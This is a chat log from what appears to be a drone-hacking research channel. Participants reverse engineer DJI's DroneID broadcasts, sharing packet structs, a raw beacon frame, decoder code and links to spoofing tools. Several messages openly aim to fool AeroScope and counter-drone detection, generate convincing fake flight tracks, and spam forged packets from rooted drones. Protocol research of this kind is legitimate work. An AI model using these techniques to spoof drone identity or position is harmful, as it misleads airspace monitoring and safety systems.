[2022-04-21 10:58:59] wavesahead : except for direction finding and the like, it does not seem they have anything that involves detection or drones doing demod and packet processing. ill see what i can do about getting some more information.

[2022-04-21 11:09:30] dkovar : Numerous U.S. CUAS firms have the ability to fingerprint and track various commercial/consumer drones via RF methods. Dedrone is just one example. The DOD and USG use some of these commercial solutions as well as DOD funded/supported solutions. I think it is reasonable to assume that Russia either developed or acquired similar capabilities, particularly since they've been fighting Ukraine since 2015 and Ukraine has been using drones since then as well. Information about CUAS systems deployed in Ukraine as well as their capabilities and their effectiveness is very hard to come by, for obvious reasons.

[2022-04-21 11:41:55] mrbou : @mrbou left the channel.

[2022-04-21 15:35:14] hostile : @jan2642 did you ever take those Mavic Air tcpdumps to get to @dragorn by chance? https://dji-rev.com/dji-rev/pl/pwdedzasg3gejgggjromjfdb4e

[2022-04-21 15:56:28] jan2642 : @hostile Yes I did but I didn't share them in the channel because they contain my position. The MP1 capture I still need to make.

[2022-04-21 15:56:54] hostile : cool just wanted to make sure @dragorn got em! Trying to do my cat wrangling responsibilities. =]

[2022-04-21 16:06:09] dragorn : :thumbsup: we good!

[2022-04-21 16:06:35] dragorn : i mean, kinda. they report bogus v2 content in the old caps too. so, "awesome".

[2022-04-21 16:06:40] dragorn : fuzzy logic time

[2022-04-21 16:55:24] wavesahead : heya

[2022-04-21 17:15:22] hostile : it is pretty asynchronous in here @wavesahead. Small busts of tech info seem to flow by every few days. No one seems *constantly* active though.

[2022-04-21 17:23:09] wavesahead : yeah that is fine

[2022-04-21 17:23:23] wavesahead : im lacking an actual aeroscope unit to test eventually, but atm it isnt really needed

[2022-04-21 17:31:02] wavesahead : what is the actual status of drone id and similar protocols, in terms of code to demod + protocol specs/descriptions?

[2022-04-21 17:31:46] wavesahead : and is there any open source project already offering detection functionality that could be used to test spoofing techniques in lieu of access to the commercial offerings?

[2022-04-21 17:32:51] wavesahead : in my opinion commercial offerings often, by nature of being opaque platforms, tend to be easy to fool, as the developers are just employees who get paid and go home, and quite honestly few companies invest in R&D to break their own products, regardless of what they say

[2022-04-21 17:47:40] wavesahead : @dragorn maybe you know.

[2022-04-21 17:47:56] wavesahead : anything that saves me time from reading through months of chat backlogs will be much appreciated

[2022-04-21 18:24:36] hostile : Both Occusync and EnhancedWifi protocol DroneID broadcasts are understood. They are transmitted in parallel to the actual c2 link. The only open source tools to recieve are kismet, and the repo above by @Proto that's it. My paper on it from 2017 is the gold standard. https://approveddronepilots.co.uk/wp-content/uploads/2018/05/Anatomy-of-DJI-Drone-ID-Implementation1.pdf

[2022-04-21 18:25:01] hostile : OGs here helped with the writup, and @dragorn with the implementation for wifi+kismet

[2022-04-21 18:25:10] hostile : kismet droneid

[2022-04-21 18:25:20] hostile : https://www.kismetwireless.net/development/droneid/

[2022-04-21 18:25:31] hostile : https://github.com/kismetwireless/kismet/blob/master/kaitai_definitions_disabled/dot11_ie_221_dji_droneid.ksy

[2022-04-21 18:26:12] hostile : only other known used protocol is the EU opendroneid format. https://github.com/opendroneid

[2022-04-21 18:26:43] wavesahead : nice, checking

[2022-04-21 18:26:56] hostile : these examples still valid today on v1 droneid packets which aeroscope MUST support still. https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie

[2022-04-21 18:27:03] hostile : https://github.com/DJISDKUser/metasploit-framework/tree/DJIDroneIDSpoof

[2022-04-21 18:27:39] wavesahead : there is absolutely no synchronicity between the broadcasts and the c2 as far as detection is involved, correct? of course a sophisticated detection platform would try to verify both but that might be tricky

[2022-04-21 18:27:50] hostile : you are correct.

[2022-04-21 18:28:12] hostile : and Aeroscope is not at all sophisticated

[2022-04-21 18:28:27] wavesahead : as far as i can see, the only way to correlate the channels would be by obvious ID fields matching in both and then you would depend on checking positional telemetry?

[2022-04-21 18:28:33] hostile : it for example accepts the 5mhz wifi droneid packets at 20mhz with no fucks (probably cuz in some countries it must support that fallback)

[2022-04-21 18:29:16] hostile : I'm not gonna spitball ways to make folks CUAS better here. ;)

[2022-04-21 18:29:21] wavesahead : indeed

[2022-04-21 18:29:31] wavesahead : i have zero interest in helping them

[2022-04-21 18:29:34] wavesahead : so, moving on to private

[2022-04-21 18:30:54] hostile : see this PR re: how to use my prior work

[2022-04-21 18:30:56] hostile : https://github.com/rapid7/metasploit-framework/pull/9301

[2022-04-21 18:31:12] hostile : lorcon restrictions on licensing prevented it from being merged into metasploit proper

[2022-04-21 18:37:38] dragorn : sorry, juggling a busy work day and being in a browser this doesn't notify me when I get tagged...

[2022-04-21 18:38:24] dragorn : Kismet handles the wifi stuff, you may need a special card tho to get 5mhz if a RC controller is involved

[2022-04-21 18:39:03] dragorn : @proto has been working on some RF stuff, and I'm happy to integrate that into kismet once it's at a state where that's feasible; the problem is I have no RF-capable drones myself so i can't really thrash on testing to get it there

[2022-04-21 18:39:42] dragorn : Right now kismet handles the "new" format of the protocol, too, but because dji is dji, it seems like it's not correctly identified, so it's going to require some fuzzy logic to see if the coordinates are garbage or not

[2022-04-21 18:40:36] dragorn : https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.cc#L45

[2022-04-21 18:41:06] dragorn : 'v1' is the 'old' format, and 'v2' is the 'new' - except that's wrong, because they all advertise '2' in the format field, AND appear to all be the same length, so either I've never seen a true V2, or DJI is busted AF again.

[2022-04-21 18:41:24] dragorn : Or there's been updates and what we think are legacy V1 packets ARE still V2

[2022-04-21 18:42:00] dragorn : kismet has a pile of other drone detection stuff too, but that's almost exclusively just looking at OUIs and SSIDs

[2022-04-21 18:42:10] dragorn : nothing elegant at all

[2022-04-21 18:43:01] dragorn : there's a yaml file in the config that gets "compiled" down into a kismet config file (because the syntax gets crappy)... but that's just OUI/SSID mapping.

[2022-04-21 18:43:43] dragorn : and kismet can do ADSB with a SDR and map advertising devices, but despite there being a slew of DJI drones registered in the global ICAO system, drones aren't supposed to be carrying ADSB transponders.

[2022-04-21 18:47:46] wavesahead : @dragorn thank you!! re coordinates, it is very much non trivial to detect bs coordinates because physics doil down to equations, like the haversine formula, so you can pre-calculate a completely valid set of coordinates and then even apply some GIS data to add in elevation.

[2022-04-21 18:48:25] wavesahead : around 2015 i made a demo in sweden with APRS, spoofing a ship drawing genitalia over an area in the pacific, just for laughs

[2022-04-21 18:49:19] wavesahead : (since aprs has quite a few internet gateways with rf to internet and internet to rf bridging)

[2022-04-21 18:50:51] dragorn : It's simpler than you fear

[2022-04-21 18:50:59] dragorn : at least, for what I care about re: coordinates

[2022-04-21 18:51:19] dragorn : i just haven't done it. between old and new formats, they moved some of the fields, and added an app coordinate field

[2022-04-21 18:51:26] dragorn : which overlaps other data in the old field

[2022-04-21 18:51:43] dragorn : so i just have to fuzzy detect if the device coordinates are wildly insanely different from the app coordinates

[2022-04-21 18:53:09] dragorn : I agree that if you're trying to validate if a given set of coordinates is realistic, that's quite hard; in this case I'm just trying to determine the format of the packet, by validating 2 (or even 3) sets of coordinates to see if the data appears to be coordinate data or not

[2022-04-21 18:53:50] dragorn : I believe a full, new-form packet contains the device location, app location, and takeoff location

[2022-04-21 18:54:12] dragorn : while an old-form packet contains a device location, some additional pitch/yaw data, and takeoff location

[2022-04-21 18:56:30] wavesahead : understood

[2022-04-21 18:56:35] hostile : Packet structure with in @wavesahead

[2022-04-21 18:56:42] wavesahead : thanks @hostile

[2022-04-21 18:56:50] wavesahead : i have a limesdr and a few hackrf boards

[2022-04-21 18:57:08] wavesahead : loaned a bladerf for a while but had to ship it back long ago

[2022-04-21 18:57:31] dragorn : Fortunately for my purposes in Kismet i don't "have" to validate coordinates - while i'd be happy to include something that tries to identify bogus coordinates, I'm much more centered on providing as close to forensic capture as I can; the new logs and pcapng allow for full retention down to the radiotap capture headers across multiple interfaces, etc.

[2022-04-21 18:57:54] hostile : This .diff works with gr-ieee802-11. Still waiting on @icer to stop partying and drop a frequency hopping graph for EnhancedWifi. He got me all activated in here, then disappeared on me ;) (teasing him dearly right now)

[2022-04-21 18:58:12] wavesahead : classic icer

[2022-04-21 19:01:31] dragorn : it's also on my shortlist to adapt that into a proper kismet input chain from soapy->grieee80211->kismet

[2022-04-21 19:01:44] dragorn : but even the short list is pretty far behind right now due to $life_shit

[2022-04-21 19:03:01] hostile : This is still cracking me up btw. DJI was so mad about that paper. lol

[2022-04-21 19:09:27] wavesahead : they can stock up on baby butt cream

[2022-04-21 19:09:43] wavesahead : if their butts are sore

[2022-04-21 19:12:50] wavesahead : brb

[2022-04-21 19:37:07] wavesahead : where could i get pcaps?

[2022-04-21 19:52:29] dragorn : the problem is pcaps by nature contain peoples home locations

[2022-04-21 19:55:39] wavesahead : indeed

[2022-04-21 19:56:31] wavesahead : if someone wants to sacrifice one, or has one that is not sensitive, i can try to make a small py to sanitize it. lemme see but im pretty sure pcap ng editing is supported.

[2022-04-21 19:58:23] wavesahead : https://stackoverflow.com/questions/32250981/pcap-modification-with-python 2015 hah, scapy has changed a bit. ill see. with the offsets kevin provided i should be able to do "position ambiguity"

[2022-04-21 19:58:52] wavesahead : https://blog.aprs.fi/2011/01/position-ambiguity-support.html < concept in APRS

[2022-04-21 19:59:14] wavesahead : "Ambiguity is configured by setting the number of digits which will be truncated from the end of the position. Plaintext APRS positions are transmitted in degrees and decimal minutes (DD° MM.mm'), with two decimals of minutes. When ambiguity is set to 1, it'll be truncated to DD° MM.m', 2 will transmit DD° mm', 4 will transmit DD° only, resulting in a resolution of 1 degree."

[2022-04-21 19:59:22] wavesahead : same can be applied to sanitize coordinates

[2022-04-21 21:05:48] wavesahead : anyone using non rpi platforms with NGFF?

[2022-04-21 21:05:59] wavesahead : otherwise i think any adapter to usb works for the atheros

[2022-04-21 21:06:35] hostile : USB ath9 does not work with 5mhz channel changing

[2022-04-21 21:09:43] hostile : btw @here we should make a linux binary to run on rooted DJI drones that just spams fake packets over the atheros. Should be trivial.

[2022-04-21 21:15:44] wavesahead : why is that? re usb

[2022-04-21 21:15:58] wavesahead : so i need a multi ngff board

[2022-04-21 21:16:07] wavesahead : maybe one of those bananapi ones with multiple sockets

[2022-04-21 21:17:38] hostile : usb driver / kernel / something has never supported it. Must be an M.2 card

[2022-04-21 21:30:06] proto : oooohhhh... derp. that makes a lot of sense. thanks for clearing that up!

[2022-04-21 21:32:35] proto : the correlation scores should be normalized which makes it really strange to hear you had to push the correlation score over 1.0 O.o i tried finding a way to install a newer version of octave on my 20.04 machine but ubuntu doesn't seem to like the octave ppa :( i'm curious if there's something goofy happening with the newer version of octave

[2022-04-21 21:36:15] wavesahead : surprised, need to look this up. the usb adapter should be ok, the wifi cards are technically connecting as usb devices even if you plug them in the ngff socket

[2022-04-21 21:36:33] wavesahead : the adapters are dumb, they have no logic

[2022-04-22 00:56:50] hostile : I assume none of these settings have effect on DroneID broadcasting the App location?

[2022-04-22 01:27:35] wavesahead : supposedly dji says depending on regulatory obligations they will ignore settings for alwayson

[2022-04-22 01:29:57] hostile : setting to CN region does sketchy shit like upload cached logs to a "secret" service

[2022-04-22 01:55:11] wavesahead : @dragorn the droneid det in kismet should work with any wifi adapter?

[2022-04-22 01:57:04] hostile : no

[2022-04-22 01:57:10] hostile : 5mhz capable adapter only

[2022-04-22 01:57:14] hostile : see channel topic mate

[2022-04-22 01:57:33] hostile : m.2 pci ath9k only

[2022-04-22 01:57:41] hostile : not "any wifi adapter"

[2022-04-22 01:58:23] hostile : Example detail: https://wiki.freebsd.org/dev/ath_hal%284%29/HalfQuarterRate

[2022-04-22 01:59:33] hostile : and requires the exact kismet config mentioned above

[2022-04-22 02:00:07] hostile : https://twitter.com/d0tslash/status/1509401805913997312?s=20&t=uQjGrrS1XEQpsj5aBMVmfQ

[2022-04-22 02:01:55] wavesahead : i need to dig in the parts bin

[2022-04-22 02:02:12] wavesahead : it's 4am here dude

[2022-04-22 02:02:17] wavesahead : im beginning to skip steps

[2022-04-22 02:02:18] wavesahead : ;)

[2022-04-22 02:03:45] hostile : sleep++

[2022-04-22 02:11:24] dkovar : Applying haversine is trivial and you can get the altitude of the launch point from some satellite dataset whose name escapes me. We've done both to make sense of AS data, and to throw out most bad data. After that, you end up comparing various points that are along a track to each other to see if any are physically impossible.

[2022-04-22 02:13:45] wavesahead : maybe that was phrased in a confusing way: what I meant was that you can generate nonsense coordinates that are valid and geographically possible (ex. your drone is not hitting the ground while passing a given point), and it is impossible to completely rule a given set of coordinates as fake if you actually craft them properly respecting haversine formula, altitude, random minute variations of speed, etc

[2022-04-22 02:14:26] dkovar : Agreed. We've generated synthetic DJI tracks for shits and grins.

[2022-04-22 02:15:10] wavesahead : the only complex thing, if you can call it complex, is the altitude and thats also suspect because you can just take the above sea level altitude and apply that, barring geo features like hills and mountains, and even then, as long as you are within max altitude for the drone you spoof, you aren't going to "collide" with anything

[2022-04-22 02:15:55] wavesahead : you could even average the heights of those features and decide that you always spoof above X height

[2022-04-22 02:15:57] wavesahead : :)

[2022-04-22 02:16:57] hostile : Lol I still wanna port my old 3dr code to DUML.

[2022-04-22 02:16:58] hostile : https://github.com/MAVProxyUser/3DRSoloHacks/blob/master/vincenty_circle_test.py#L167

[2022-04-22 02:17:24] hostile : this used to use vicenty direct algo to calculate polygons in the air based on a central GPS point. In this case drawing a dick in the sky

[2022-04-22 02:17:49] hostile : Sky peen coords for a field near my home.

[2022-04-22 02:18:45] hostile : ``` # Vincenty's Direct formulae def vinc_pt(phi1, lembda1, alpha12, s ) : ```

[2022-04-22 02:18:53] hostile : this function is very useful for such fun.

[2022-04-22 02:19:37] hostile : combine that with an altitude variation function and you've got a ripe tool for flight path generation.

[2022-04-22 02:20:06] hostile : way less sophisticated than what you all described. but it proved a point for a talk I was giving.

[2022-04-22 04:05:39] wavesahead : the seq component of the droneid struct in v1 and v2, how is it treated?

[2022-04-22 04:05:48] wavesahead : is it incremented on every broadcast?

[2022-04-22 04:10:54] hostile : decode the pcap I sent you from my drone

[2022-04-22 04:10:57] hostile : it will all make sense

[2022-04-22 04:11:06] hostile :

[2022-04-22 04:16:33] hostile : but to direclt answer... yes @wavesahead they do.

[2022-04-22 04:16:34] hostile :

[2022-04-22 04:16:50] wavesahead : ack, thanks for reminding me

[2022-04-22 04:17:05] hostile : resent the pcap on signal...

[2022-04-22 04:17:08] wavesahead : im adding altitude shifts and state to the little project here.

[2022-04-22 04:17:09] hostile : actually sleeping now

[2022-04-22 04:17:11] wavesahead : yes i have it

[2022-04-22 04:17:16] wavesahead : i should be haha

[2022-04-22 04:18:06] wavesahead : is there anything still using v1?

[2022-04-22 04:18:25] wavesahead : otherwise i can just limit it to v2 support

[2022-04-22 04:21:00] wavesahead : $ python ../../DJIdroneidV2.py ~/Downloads/DJIMiniSE5mhz.pcap on it, it feels almost as if i was running this on a f* amiga

[2022-04-22 04:41:53] hostile : people stay on old firmware. v1 ain't going away

[2022-04-22 04:42:20] hostile : Aeroscope supports v1 & v2 packets on its listenign interfaces

[2022-04-22 05:10:07] hostile : btw this is the historic Intro to AeroScope from Walter Stockwell of DJI. https://www.icao.int/Meetings/UAS2017/Documents/Walter%20Stockwell_Stream%20A.pdf

[2022-04-22 05:10:20] hostile :

[2022-04-22 05:10:55] hotelzululima : asleep hah!

[2022-04-22 05:20:13] proto : i have most of a gnuradio OOT module for demodulating drone id. still gotta figure out why equalization fails and add function calls for the FEC, but the guts are there https://github.com/proto17/dji_droneid/tree/gr-droneid/gnuradio/gr-droneid

[2022-04-22 06:59:13] wavesahead : @hostile go to fucking sleep man

[2022-04-22 06:59:38] wavesahead : although the fair thing would be that you dont sleep and stay here providing me with pcaps and assorted tidbits

[2022-04-22 07:00:26] wavesahead : @proto sweet work

[2022-04-22 07:55:51] wavesahead : @dragorn scapy is temperamental

[2022-04-22 13:38:58] dragorn : @wavesahead sure - that's why i don't use it. Not sure the context?

[2022-04-22 13:39:10] dragorn : @proto awesome

[2022-04-22 16:21:07] wavesahead :

[2022-04-22 16:21:11] wavesahead : @dragorn there

[2022-04-22 16:21:20] wavesahead : hold on, will paste the code for the beacon frame

[2022-04-22 16:21:46] wavesahead : uint8_t beacon_raw[] = { 0x80, 0x00, // 0-1: Frame Control 0x00, 0x00, // 2-3: Duration 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // 4-9: Destination address (broadcast) 0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 10-15: Source address 0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 16-21: BSSID 0x00, 0x00, // 22-23: Sequence / fragment number 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 24-31: Timestamp (GETS OVERWRITTEN TO 0 BY HARDWARE) 0x64, 0x00, // 32-33: Beacon interval 0x00, 0x05, // 34-35: Capability info 0x00, 0x00, /* FILL CONTENT HERE */ // 36-38: SSID parameter set, 0x00:length:content 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, // 39-48: Supported rates 0x03, 0x01, 0x01, // 49-51: DS Parameter set, current channel 1 (= 0x01), 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, // 52-57: Traffic Indication Map 0x07, 0x06, 0x55, 0x53, 0x00, 0x01, 0x0b, 0x1e, // 58-65: Country information 0x2a, 0x01, 0x00, // 66-68: ERP information 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, // 69-74: Extended supported rates 0x2d, 0x1a, 0xac, 0x01, 0x02, 0xff, 0xff, 0x00, // 75-103: HT Capabilities 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // HT Information 0x3d, 0x16, // 104-105: HT field /* CHANNEL */ 0x01, // 106: Channel, default to 1 0x01, 0x00, 0x00, // 107-128: HT info (2) 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // IMPROVE: must verify this is truly static across firmware versions and models 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, // 129-151: RSN Information 22 bytes 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x0c, 0x00, // IMPROVE: must verify this is truly static across firmware versions and models 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, // 152-178: Vendor Specific: 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, // Microsoft WMM/WME Paramater Element 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, // 26 bytes 0x2f, 0x00, };

[2022-04-22 16:22:00] wavesahead : im sending that + droneid v1

[2022-04-22 16:22:14] hostile : https://twitter.com/74ck_0/status/1517483406518591490/

[2022-04-22 16:24:57] wavesahead : yes, i know the struct... it;s there

[2022-04-22 16:25:14] wavesahead : struct enhancedwifi_droneid_v1 { uint64_t header; uint8_t sub_cmd; uint8_t version; uint16_t seq; uint8_t state_info[2]; uint8_t sn[DJI_WIFI_DRONEID_SN_LENGTH]; int32_t latitude; int32_t longitude; int16_t altitude; int16_t height; int16_t v_north; int16_t v_east; int16_t v_up; int16_t pitch; int16_t roll; int16_t yaw; int16_t latitude_home; int16_t longitude_home; uint8_t product_type; uint8_t uuid_len; uint8_t uuid[DJI_WIFI_DRONEID_UUID_LENGTH]; };

[2022-04-22 16:31:37] wavesahead : interestingly enough, that crc was missing in the code you sent me but it should not be causing this

[2022-04-22 16:32:04] wavesahead : @dragorn i can send you the pcap, do droneid frames decode properly in wireshark?

[2022-04-22 16:32:09] wavesahead : perhaps this is normal behavior

[2022-04-22 16:41:28] wavesahead : fixed one issue with the frame struct

[2022-04-22 16:44:00] wavesahead : { "seqNum": 40, "status": "1110101111110000", "droneID": "", "longitude": 18.399187431254017, "latitude": 13.517770357656014, "absoluteHeight": 0, "altitude": 0.0, "north": 654.27, "east": 654.45, "down": 2.29, "yaw": 2.51, "appGPSTime": 13793055535660.922, "appGPSLatitude": 580.5133444019231, "appGPSLongitude": 4825.540699555686, "homeLongitude": 11752.95062521871, "homeLatitude": 8093.16116142556, "productType": "product111", "uuid": "M" }

[2022-04-22 16:44:02] wavesahead : working

[2022-04-22 16:44:07] wavesahead : now i just need to fix up that crap

[2022-04-22 16:56:51] wavesahead : @the_lord can you confirm the header in droneid v1 and v2?

[2022-04-22 17:00:34] proto : @wavesahead i think that matches well with the decoded RF drone id (not wifi). giving it a good look over now

[2022-04-22 17:07:11] wavesahead : possibly the same bit by bit

[2022-04-22 17:07:18] wavesahead : it's all little endian btw

[2022-04-22 17:09:11] proto : funny timing as i quite literally just looked at the seq number and thought "that's prob byte swapped"

[2022-04-22 17:23:54] the_lord : this is V2, but you need to handle the values correctly

[2022-04-22 17:39:50] wavesahead : yes, i was crafting v1 packets

[2022-04-22 17:40:09] wavesahead : @the_lord do you know what format the sn follows?

[2022-04-22 17:40:33] wavesahead : as in, anyone reversed that? to generate valid ones (so as long as they dont check against their cloud)

[2022-04-22 17:41:44] wavesahead : global first_line # var v1000000 float64 = 10000000.0 # var djiConst float64 = 57.2957795785523 # ["SEQ_NUM"] = (2) bytes # ["STATUS_INFO"] = (2) bytes # ["AIRCRAFT_SN"] = STRING(16) bytes # ["CUR_POS_LONGITUDE"] = ((4) bytes / v1000000) * djiConst # ["CUR_POS_LATITUDE"] = ((4) bytes / v1000000) * djiConst # ["CUR_GPS_ABS_HEIGHT"] = (2) bytes # ["CUR_BARO_HEIGHT"] = (2) bytes / 10 # ["VX_NORTH_SPEED"] = (2) bytes / 100 # ["VY_EAST_SPEED"] = (2) bytes / 100 # ["VZ_RISE_SPEED"] = (2) bytes / 100 # ["YAW"] = (2) bytes / v100 # ["APP_GPS_TIMESTAMP"] = (8) bytes # ["APP_GPS_LATITUDE"] = ((4) bytes / v1000000) * djiConst # ["APP_GPS_LONGITUDE"] = ((4) bytes / v1000000) * djiConst # ["HOME_LONGITUDE"] = ((4) bytes / v1000000) * djiConst # ["HOME_LATITUDE"] = ((4) bytes / v1000000) * djiConst # ["PRODUCT_TYPE"] = (1) byte # ["UUID_Length"] = (1) byte # ["UUID"] = STRING(int(["UUID_Length"]

[2022-04-22 17:42:06] wavesahead : d['seqNum'] = unpack_short(data[2:2+2]) d['status'] = reverse(f"{unpack_short(data[4:4+2]):016b}") d['droneID'] = unpack_string(data[6:6+16]) d['longitude'] = unpack_latlon(data[22:22+4]) d['latitude'] = unpack_latlon(data[26:26+4]) d['absoluteHeight'] = unpack_short(data[30:30+2]) d['altitude'] = unpack_short(data[32:32+2]) / 10 d['north'] = unpack_short(data[34:34+2]) / 100 d['east'] = unpack_short(data[36:36+2]) / 100 d['down'] = unpack_short(data[38:38+2]) / 100 d['yaw'] = unpack_short(data[40:40+2]) / 100 d['appGPSTime'] = unpack_long(data[42:42+8]) / 1000 d['appGPSLatitude'] = unpack_latlon(data[50:50+4]) d['appGPSLongitude'] = unpack_latlon(data[54:54+4]) d['homeLongitude'] = unpack_latlon(data[58:58+4]) d['homeLatitude'] = unpack_latlon(data[62:62+4]) d['productType'] = producttype2name(data[66]) uuid_len = data[67]

[2022-04-22 17:42:10] wavesahead : how about the header??

[2022-04-22 17:42:25] wavesahead : struct enhancedwifi_droneid_v2 { uint64_t header; uint8_t sub_cmd; uint8_t version; uint16_t seq; uint8_t state_info[2];

[2022-04-22 17:45:08] the_lord : what do you mean by what format?

[2022-04-22 17:46:03] the_lord : appGPSTime should not divide by 1000, it is timestamp in milliseconds

[2022-04-22 17:47:16] wavesahead : v1

[2022-04-22 17:47:21] wavesahead : if you have the struct def handy

[2022-04-22 17:47:31] wavesahead : and for the coords, are they in degrees or radians?

[2022-04-22 17:47:40] the_lord : all GPS coordinates in V2 should be divided by 10000000 then multiplied by 57.2957795785523

[2022-04-22 17:51:11] the_lord : regarding SN, both V1 and V2 are the same format old models SN length is 10 characters, newer models 14, Mavic 3 16 character

[2022-04-22 17:51:47] proto : can confirm sn on the dji mini 2 is 14 bytes

[2022-04-22 18:04:21] wavesahead : struct enhancedwifi_droneid_v2 { uint64_t header; uint8_t sub_cmd; uint8_t version; uint16_t seq; uint8_t state_info[2]; uint8_t sn[DJI_WIFI_DRONEID_SN_LENGTH]; int32_t longitude; int32_t latitude; int16_t absolute_height; int16_t altitude; int16_t vx_north_speed; int16_t vy_east_speed; int16_t vz_rise_speed; int16_t yaw; uint64_t app_gps_time; int32_t app_gps_latitude; int32_t app_gps_longitude; int32_t home_longitude; int32_t home_latitude; uint8_t product_type; uint8_t uuid_len; uint8_t uuid[DJI_WIFI_DRONEID_UUID_LENGTH]; };

[2022-04-22 18:04:33] wavesahead : #define DJI_WIFI_DRONEID_SN_LENGTH 16 #define DJI_WIFI_DRONEID_UUID_LENGTH 20

[2022-04-22 18:04:47] wavesahead : const unsigned char *dji_droneinfo_hdr = (unsigned char *) "\xDDR&7\x12Xb\x13";

[2022-04-22 18:05:13] wavesahead : { "seqNum": 499, "status": "1110101111110000", "droneID": "", "longitude": 13.517770357656014, "latitude": 18.399187431254017, "absoluteHeight": 0, "altitude": 6538.5, "north": 0.0, "east": 653.57, "down": 653.2, "yaw": 653.48, "appGPSTime": 0.007, "appGPSLatitude": 0.0, "appGPSLongitude": 18.399187431254017, "homeLongitude": 13.517770357656014, "homeLatitude": 13.517770357656014, "productType": "product0", "uuid": "" }

[2022-04-22 18:05:16] wavesahead : not decoding properly

[2022-04-22 18:05:26] wavesahead : seqnum is right

[2022-04-22 18:05:32] wavesahead : status is nonsense

[2022-04-22 18:05:55] wavesahead : b9ae33caf9f23a7196764720b0d9dc6fc5ca5dd0e4dbce1f832abf0ae10e59be ../DJIdroneidV2.py

[2022-04-22 18:06:30] proto : thank you very much for showing the protocol! i'm walking through an outdoor collect of the rf drone id now

[2022-04-22 18:06:52] wavesahead : still working out some quirks

[2022-04-22 18:09:44] proto : i think in the mini 2 the sn is 16 bytes, but only 14 are used. the last two are zeros, then a valid lon and lat

[2022-04-22 18:10:40] the_lord : SN field is always 16 bytes, if the actual SN was 14 you need to add zero padding to it

[2022-04-22 18:12:11] wavesahead : I'm digging for the SN format (if someone reversed a keygen even better)

[2022-04-22 18:15:05] wavesahead : { "seqNum": 270, "status": "1110101111110000", "droneID": "2387DA7E3E7717H", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 0, "altitude": 6541.5, "north": 0.0, "east": 1.2, "down": 654.11, "yaw": 1.69, "appGPSTime": 0.007, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "product0", "uuid": "" }

[2022-04-22 18:15:07] wavesahead : a bit better

[2022-04-22 18:16:58] proto : works out well for me. i think the diff is that there is no 64-bit header. i have a length identifier in the first byte that covers the entire frame. i also have a CRC16 at the end. with a zero byte that is maybe for CRC24 capability?

[2022-04-22 18:31:35] faineg : i am VERY interested in those questions too. i can also tell you 110% that the international humanitarian aid community uses DJI drones globally, increasingly in dangerous conflict zones....

[2022-04-22 18:31:46] proto : is there anything like an aeroscope simulator? would like to try tx'ing some frames but don't have anything to know if it's valid other than just demod'ing what i tx

[2022-04-22 18:33:15] proto : also, does anyone have an application that can generate what appears to be valid flight info? i saw earlier that ppl were talking about algos that can produce something that looks valid, but nothing about someone having a tool that we can use to help populate all the required fields in the drone id frame

[2022-04-22 18:37:12] faineg : hmm, thanks for sharing

[2022-04-22 18:38:37] faineg : many examples of recent DJI use in the spreadsheet I'm maintaining https://docs.google.com/spreadsheets/d/1NtgseODXGSAomx6G5Efwz4XY6AuYF9ZjGSGiCxvNHXE/edit?usp=sharing

[2022-04-22 18:38:47] faineg : the Kadyrovites really are wild about them

[2022-04-22 18:39:28] faineg : yup

[2022-04-22 19:18:38] hostile : anyone here know if the NexMon BCM4339 framework can allow us to tune to 5mhz channels and recieve / generate 802.11 beacons? https://twitter.com/nexmon_dev/status/984544978537009152

[2022-04-22 19:19:08] hostile : hrmm ``` the directory payload_generation contains the MATLAB script generate_frame.m that generates a Wi-Fi beacon frame with SSID MyCovertChannel. ```

[2022-04-22 19:19:46] hostile : https://github.com/seemoo-lab/mobisys2018_nexmon_software_defined_radio/blob/master/payload_generation/generate_frame.m

[2022-04-22 19:21:48] hostile : @wavesahead ... may be another alternative to ESP32.

[2022-04-22 19:22:43] hostile : lol that is ugly https://github.com/seemoo-lab/mobisys2018_nexmon_software_defined_radio/blob/master/payload_generation/myframe.sh

[2022-04-22 19:24:26] hostile : Looks like it would need a 1/4 rate added to it's set_rate() function eh? https://github.com/seemoo-lab/mobisys2018_nexmon_software_defined_radio/blob/master/payload_generation/ieee_80211_encoder.m#L105

[2022-04-22 19:26:54] dragorn : There is no 'droneid frame' in wifi - it's an IE 221 custom vendor tag in some beacons. No, wireshark doesn't currently decode them.

[2022-04-22 19:28:29] dragorn : Adding decode for that tag to wireshark is on my list, but, many things are on that list

[2022-04-22 19:32:34] atlantic : the length byte at the beginning and the crc16 at the end is only at Ocusync. It is not at the wifi beacon.

[2022-04-22 20:20:50] wavesahead : @dragorn

[2022-04-22 20:22:54] dragorn : Its one of the 221 tags, yes. Looks like your capture is otherwise somewhat corrupted - maybe missing fcs when it thinks it needs it, maybe including fcs when rtap says it isn't there

[2022-04-22 20:24:18] wavesahead : lemme see, it might be something i did

